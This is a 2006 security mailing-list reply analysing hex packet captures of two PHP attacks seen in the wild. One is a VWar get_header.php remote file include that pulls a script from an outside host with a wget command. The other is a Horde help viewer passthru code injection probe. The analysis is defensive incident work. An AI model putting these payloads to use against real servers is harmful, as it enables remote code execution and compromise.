Re: Someone scanning for new PHP issues?

Bojan Zdrnja Sun, 16 Apr 2006 12:01:32 -0700

On 4/16/06, Jamie Riden <[EMAIL PROTECTED]> wrote:
> One of these might be the Horde exploit-
> http://isc.sans.org/diary.php?storyid=1262 - any ideas on the other?
>
> cheers,
>  Jamie
>
> 02:38:43.817967 IP compromised.com.1044 > www.example.com.www: P
> 0:412(412) ack 1 win 65535
>        0x0000:  4500 01c4 a2ac 4000 7106 5012 0ca2 a1a1  [EMAIL PROTECTED]
>        0x0010:  48e8 1e4a 0414 0050 ec05 5522 9e0c 2a9d  H..J...P..U"..*.
>        0x0020:  5018 ffff 3431 0000 4745 5420 6874 7470  P...41..GET.http
>        0x0030:  3a2f 2fxx xx2e yyyy yy2e 3330 2e37 342f  ://xx.yyy.30.74/
>        0x0040:  7677 6172 2f69 6e63 6c75 6465 732f 6765  vwar/includes/ge
>        0x0050:  745f 6865 6164 6572 2e70 6870 3f76 7761  t_header.php?vwa
>        0x0060:  725f 726f 6f74 3d68 7474 703a 2f2f 7870  r_root=http://xp
>        0x0070:  6c2e 6e65 746d 6973 7068 6572 6532 2e63  l.netmisphere2.c
>        0x0080:  6f6d 2f43 4d44 2e67 6966 3f26 636d 643d  om/CMD.gif?&cmd=
>        0x0090:  7767 6574 2048 5454 502f 312e 300d 0a48  wget.HTTP/1.0.


This is a VWar vulnerability in the get_header.php file (remote file
include vulnerability). More info at
http://www.securityfocus.com/bid/17358/info.

> 02:38:43.841958 IP compromised.com.1047 > www.example.com.www: P
> 1205950111:1205950537(426) ack 2648749032 win 65535
>        0x0000:  4500 01d2 a2b9 4000 7206 4ef7 0ca2 a1a1  [EMAIL PROTECTED]
>        0x0010:  48e8 1e4a 0417 0050 47e1 569f 9de0 b3e8  H..J...PG.V.....
>        0x0020:  5018 ffff 1fd8 0000 4745 5420 6874 7470  P.......GET.http
>        0x0030:  3a2f 2fxx xx2e yyyy yy2e 3330 2e37 342f  ://xx.yyy.30.74/
>        0x0040:  7765 626d 6169 6c2f 686f 7264 652f 7365  webmail/horde/se
>        0x0050:  7276 6963 6573 2f68 656c 702f 3f73 686f  rvices/help/?sho
>        0x0060:  773d 6162 6f75 7426 6d6f 6475 6c65 3d3b  w=about&module=;
>        0x0070:  2532 322e 7061 7373 7468 7275 2825 3232  %22.passthru(%22
>        0x0080:  6563 686f 2532 3049 524f 434b 5448 4557  echo%20IROCKTHEW
>        0x0090:  4f52 4c44 2532 3229 3b27 2e20 4854 5450  ORLD%22);'..HTTP
>        0x00a0:  2f31 2e30 0d0a 486f 7374 3a20 3732 2e32  /1.0..Host:.72.2
>        0x00b0:  3332 2e33 302e 3734 0d0a 5265 6665 7265  32.30.74..

This is, as you wrote above, the Horde Help Viewer remote php code
execution vulnerability. More info at
http://www.securityfocus.com/bid/17292.

Unfortunately exploits are in the wild, and the Horde one is
especially bad (knowing that Horde is used a lot).

Cheers,

Bojan

Re: Someone scanning for new PHP issues?

Reply via email to